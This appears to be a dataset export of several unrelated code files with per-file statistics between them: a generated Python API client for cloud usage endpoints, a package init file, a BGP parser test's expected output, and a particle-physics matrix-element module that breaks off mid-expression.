del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_rocket_storage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/rocket_storages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RocketStoragesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_server_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level Server usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_server_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: ServersUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_server_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_server_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_server_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level Server usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_server_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: ServersUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_server_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_server_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/servers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ServersUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_snapshot_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level snapshot usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_snapshot_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: SnapshotsUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_snapshot_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_snapshot_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_snapshot_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level snapshot usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_snapshot_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: SnapshotsUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_snapshot_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_snapshot_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/snapshots', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotsUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_storage_backup_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level storage backup usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_storage_backup_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: StorageBackupUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_storage_backup_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_storage_backup_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_storage_backup_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level storage backup usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_storage_backup_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: StorageBackupUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_storage_backup_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_storage_backup_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/storage_backups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StorageBackupUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_template_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level templates usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_template_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: TemplatesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_template_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_template_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_template_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level templates usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_template_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: TemplatesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_template_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_template_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage/templates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemplatesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_level_usage_get(self, from_time, **kwargs): # noqa: E501
"""get project level usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: UsageGetResponseOverview
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.project_level_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.project_level_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def project_level_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get project level usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.project_level_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: UsageGetResponseOverview
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_level_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `project_level_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/projects/usage', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UsageGetResponseOverview', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 49.165927
| 12,787
| 0.645126
| 14,917
| 121,784
| 5.020446
| 0.046591
| 0.044759
| 0.029964
| 0.021151
| 0.885045
| 0.882254
| 0.878609
| 0.876699
| 0.87475
| 0.873227
| 0
| 0.015585
| 0.267638
| 121,784
| 2,476
| 12,788
| 49.185784
| 0.824083
| 0.41131
| 0
| 0.860798
| 0
| 0
| 0.22374
| 0.055469
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03386
| false
| 0
| 0.00301
| 0
| 0.087284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4d342dc12a5d1c6bb072aaafcb237efac6cc5826
| 153
|
py
|
Python
|
eagerx_ode/__init__.py
|
eager-dev/eagerx_ode
|
2f8f2f0726816f7b794369758c626a8c16742e87
|
[
"Apache-2.0"
] | 1
|
2022-03-24T10:32:30.000Z
|
2022-03-24T10:32:30.000Z
|
eagerx_ode/__init__.py
|
eager-dev/eagerx_ode
|
2f8f2f0726816f7b794369758c626a8c16742e87
|
[
"Apache-2.0"
] | null | null | null |
eagerx_ode/__init__.py
|
eager-dev/eagerx_ode
|
2f8f2f0726816f7b794369758c626a8c16742e87
|
[
"Apache-2.0"
] | null | null | null |
__version__ = "0.1.12"
import eagerx_ode.engine # noqa: F401
import eagerx_ode.engine_nodes # noqa: F401
import eagerx_ode.engine_states # noqa: F401
| 30.6
| 45
| 0.771242
| 24
| 153
| 4.541667
| 0.5
| 0.330275
| 0.412844
| 0.577982
| 0.53211
| 0.53211
| 0
| 0
| 0
| 0
| 0
| 0.098485
| 0.137255
| 153
| 4
| 46
| 38.25
| 0.727273
| 0.20915
| 0
| 0
| 0
| 0
| 0.051282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4d60dfd090478d73216c52cb67c93755fca1c55b
| 8,772
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpBgpNeighborsAdvertisedRoutes/cli/equal/golden_output3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpBgpNeighborsAdvertisedRoutes/cli/equal/golden_output3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpBgpNeighborsAdvertisedRoutes/cli/equal/golden_output3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
"vrf": {
"default": {
"neighbor": {
"192.168.2.65": {
"address_family": {
"ipv4 unicast": {
"advertised": {
"0.0.0.0": {
"index": {
1: {
"status_codes": "r>i",
"next_hop": "10.250.6.1",
"origin_codes": "i",
"metric": 0,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.0.0.0": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 768,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.1.100.23/32": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "i",
"metric": 0,
"localprf": 300,
"weight": 0,
"path": "65000 65000 65000 65005"
}
}
},
"10.1.138.0/24": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.2.28.11/32": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 51968,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.21.198.0/24": {
"index": {
1: {
"status_codes": "*>",
"next_hop": "192.168.198.14",
"origin_codes": "?",
"weight": 32768,
"localprf": 51712
}
}
},
"10.100.248.128/26": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.144.128/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.145.0/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.145.128/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.146.0/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.146.128/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
}
},
"bgp_table_version": 1186969,
"local_router_id": "10.250.6.2"
}
}
}
}
}
}
}
| 51
| 77
| 0.141587
| 336
| 8,772
| 3.571429
| 0.190476
| 0.06
| 0.12
| 0.17
| 0.805833
| 0.805833
| 0.786667
| 0.7175
| 0.7175
| 0.7175
| 0
| 0.204728
| 0.77337
| 8,772
| 172
| 78
| 51
| 0.398893
| 0
| 0
| 0.569767
| 0
| 0
| 0.141457
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4d8d98b3d63b2f13648e3d38b392a7e9ff36ccb4
| 16,016
|
py
|
Python
|
hazma/pseudo_scalar_mediator/_pseudo_scalar_mediator_msqrd_rambo.py
|
LoganAMorrison/Hazma
|
e9612729767ff48d5ce50633393f81ee021242d2
|
[
"MIT"
] | 6
|
2019-07-30T18:14:43.000Z
|
2020-10-25T04:58:44.000Z
|
hazma/pseudo_scalar_mediator/_pseudo_scalar_mediator_msqrd_rambo.py
|
LoganAMorrison/Hazma
|
e9612729767ff48d5ce50633393f81ee021242d2
|
[
"MIT"
] | 8
|
2017-12-19T08:06:59.000Z
|
2021-04-22T02:15:26.000Z
|
hazma/pseudo_scalar_mediator/_pseudo_scalar_mediator_msqrd_rambo.py
|
LoganAMorrison/Hazma
|
e9612729767ff48d5ce50633393f81ee021242d2
|
[
"MIT"
] | 1
|
2020-04-01T11:08:49.000Z
|
2020-04-01T11:08:49.000Z
|
from hazma.field_theory_helper_functions.common_functions import minkowski_dot as MDot
from hazma.parameters import charged_pion_mass as mpi
from hazma.parameters import neutral_pion_mass as mpi0
from hazma.parameters import up_quark_mass as muq
from hazma.parameters import down_quark_mass as mdq
from hazma.parameters import b0, vh, fpi, qe
import numpy as np
class PseudoScalarMediatorMSqrdRambo:
def msqrd_xx_to_p_to_pm0(self, momenta):
"""
Returns the squared matrix element for dark matter annihilating into
two charged pions and a netural pion through a scalar mediator.
This function is used for RAMBO.
Parameters
----------
momenta : numpy.array
List of momenta of the final state particles. The first momentum is
for the positively charged pion, the second is for the negatively
charged pion and the third is for the neutral pion.
self : PseudoScalarMediatorParameters or PseudoScalarMediator object
Parameter object for the pseudo-scalar mediator theory.
Returns
-------
msqrd : float
The squared matrix element for a given set of momenta.
"""
p1 = momenta[0]
p2 = momenta[1]
p3 = momenta[2]
P = sum(momenta)
mx = self.mx
mp = self.mp
gpxx = self.gpxx
gpuu = self.gpuu
gpdd = self.gpdd
gpGG = self.gpGG
beta = self.beta
widthp = self.width_p
pxmag = np.sqrt(P[0] ** 2 / 4.0 - mx ** 2)
px = np.array([P[0] / 2.0, 0.0, 0.0, pxmag])
pxbar = np.array([P[0] / 2.0, 0.0, 0.0, -pxmag])
""" Order beta^0 """
beta0 = (
gpxx ** 2
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
** 2
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
""" Order beta^1 """
beta1 = (
2
* beta
* gpxx ** 2
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
* (
b0 * mdq * vh
+ 2 * mpi ** 2 * vh
- 2 * mpi0 ** 2 * vh
+ b0 * muq * vh
+ 4 * vh * MDot(p1, p2)
- 2 * vh * MDot(p1, p3)
- 2 * vh * MDot(p2, p3)
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
""" Order beta^2 """
beta2 = (
beta ** 2
* gpxx ** 2
* (
2
* (
2 * b0 * fpi * gpGG * mdq
- 2 * b0 * fpi * gpGG * muq
+ 2 * b0 * fpi * gpdd * vh
- 2 * b0 * fpi * gpuu * vh
)
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
- (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
** 2
+ (
b0 * mdq * vh
+ 2 * mpi ** 2 * vh
- 2 * mpi0 ** 2 * vh
+ b0 * muq * vh
+ 4 * vh * MDot(p1, p2)
- 2 * vh * MDot(p1, p3)
- 2 * vh * MDot(p2, p3)
)
** 2
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
msqrd = beta0 + beta1 + beta2
return msqrd
def msqrd_xx_to_p_to_pm0g(self, momenta):
"""
Returns the squared matrix element for dark matter annihilating into
two charged pions, a netural pion and a photon through a scalar
mediator. This function is used for RAMBO.
Parameters
----------
momenta : numpy.array
List of momenta of the final state particles. The first momentum is
for the positively charged pion, the second is for the negatively
charged pion, the third is for the neutral pion and the last is
for the photon.
self : PseudoScalarMediatorParameters or PseudoScalarMediator object
Parameter object for the pseudo-scalar mediator theory.
Returns
-------
msqrd : float
The squared matrix element for a given set of momenta.
"""
mx = self.mx
mp = self.mp
gpxx = self.gpxx
gpuu = self.gpuu
gpdd = self.gpdd
gpGG = self.gpGG
beta = self.beta
widthp = self.width_p
p1 = momenta[0]
p2 = momenta[1]
p3 = momenta[2]
k = momenta[3]
P = sum(momenta)
pxmag = np.sqrt(P[0] ** 2 / 4.0 - mx ** 2)
px = np.array([P[0] / 2.0, 0.0, 0.0, pxmag])
pxbar = np.array([P[0] / 2.0, 0.0, 0.0, -pxmag])
beta0 = -(
gpxx ** 2
* qe ** 2
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
** 2
* (
mpi ** 2 * MDot(k, p1) ** 2
+ mpi ** 2 * MDot(k, p2) ** 2
- 2 * MDot(k, p1) * MDot(k, p2) * MDot(p1, p2)
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* MDot(k, p1) ** 2
* MDot(k, p2) ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(k, p1)
- MDot(k, p2)
- MDot(k, p3)
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (
MDot(k, p1)
+ MDot(k, p2)
